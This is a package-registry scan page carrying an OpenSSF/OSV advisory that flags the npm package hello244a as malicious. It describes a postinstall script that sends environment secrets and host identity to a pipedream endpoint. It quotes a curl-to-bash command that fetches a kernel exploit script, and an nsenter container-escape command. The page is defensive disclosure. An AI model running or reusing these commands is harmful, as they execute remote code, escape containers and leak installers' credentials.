registry  /  hello244a  /  1.0.22

hello244a@1.0.22

OSV Malicious Advisory

scanned 4h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-5188 confirms this npm version as malicious. package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2)...

Advisory
MAL-2026-5188
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in hello244a (npm)
Details
package.json declares a postinstall script that, on npm install, (1) enumerates process.env plus os.hostname(), os.platform(), os.arch(), and whoami output, base64-encodes the collected data, and issues an HTTP GET to a hardcoded pipedream request-bin at http://eodxy50gl486xrx.m.pipedream.net/, exfiltrating installer environment variables and host identity to an attacker-controlled endpoint over cleartext HTTP; (2) on Linux, executes `curl -s https://raw.githubusercontent.com/Akabe1/akabe1.github.io/master/_posts/exploits/cve-2021-22555/exploit.sh | bash`, fetching and running an unpinned third-party shell script referencing a known Linux kernel local-privilege-escalation CVE; (3) attempts container/sandbox escape via `nsenter --mount=/proc/1/ns/mnt -- /bin/sh` on Linux and `docker exec` against running containers on Windows, with results reported back to the same pipedream endpoint. Behavior fires automatically on `npm install` with no user interaction. Installer harm is concrete: environment variables (which routinely contain credentials, tokens, and CI secrets) plus host identity are leaked to the attacker, and arbitrary attacker-controlled code executes in the installer's user context with privilege-escalation and container-escape attempts. ## Source: ossf-package-analysis (91844b3ed7a531e129cbdeef1746ccd1e8e981f74da00aa2a4aef2edf6b47dbf) The OpenSSF Package Analysis project identified 'hello244a' @ 1.0.12 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Decision reason
OpenSSF Malicious Packages via OSV confirms hello244a@1.0.22 as malicious (MAL-2026-5188): Malicious code in hello244a (npm)

Source & flagged code

0 flagged
No flagged code excerpts are attached to this scan.

Findings

1 High
HighOsv Malicious Advisory